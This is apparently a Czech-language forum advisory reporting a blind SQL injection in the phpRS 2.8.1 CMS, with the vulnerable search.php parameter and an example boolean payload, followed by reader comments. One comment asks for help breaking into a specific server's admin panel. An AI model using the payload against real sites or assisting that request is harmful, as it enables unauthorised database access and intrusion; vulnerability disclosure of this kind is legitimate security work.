phpRS 2.8.1 Blind SQL Injection

Verze pro tiskPDF verze

CMS: phpRS 2.8.1
Bug: Blind SQL Injection
Version: public
URL: http://supersvet.cz/download.php
Author: RubberDuck
Found Date: 21-06-09
Publication Date: 28-01-10

/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
/*-
/*- http://victim.at/phprs/search.php?rstext=all-phpRS-all&rstema=[SQLi]
/*- Example: 1 and 1=(ascii(substring((SELECT version() LIMIT 1,1),1,1))=5)
/*-
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Hack VPS

čaute potreboval by som hacknut toto http://93.185.107.176/apanel/ poviete mi ako nato Dakujem

NORS

Pokud máte někdo chuť, můžete zkusit hacknout další český redakční systém - NORS (http://norsphp.com). V případě úspěchu mi ale prosím před zveřejněním včas napište o jakou zranistelnost se jedná na mail - [email protected].

vyzva :)

aa to je vyzva :) neco s tim urcite udelame

Obrázek uživatele RubberDuck

Tak pokusit se můžeme :) Ale

Tak pokusit se můžeme :) Ale ještě pár dní nebude čas. Holt nejen zábavou živ je člověk :)

nice one :)

Pekne ...
KOukam, ze jde o posledni verzi tohoto cms ;)

Obrázek uživatele RubberDuck

Ano. Ale od doby vydání této

Ano. Ale od doby vydání této poslední verze (verze 3 je asi stále ve vývoji) vyšlo několik patchů, takže je možné, že je tato chyba již zaplátovaná.

Viz: http://www.phprs.cz/magazin/download.php?sekce=6

Kažopádně mám v plánu se podívat znovu do kódu a prohlédnout si i pluginy ;)

fajn práca s phpRS :)

Ak máš čas a chuť, kľudne prever aj toto:
phprs.cz/magazin/download.php?akce=detail&id_detail=49&sekce=7
V prípade záujmu poskytnem živý web s touto verziou na "testovanie" ;-)

Obrázek uživatele RubberDuck

Až budu mít trochu více času,

Až budu mít trochu více času, rád se podívám :)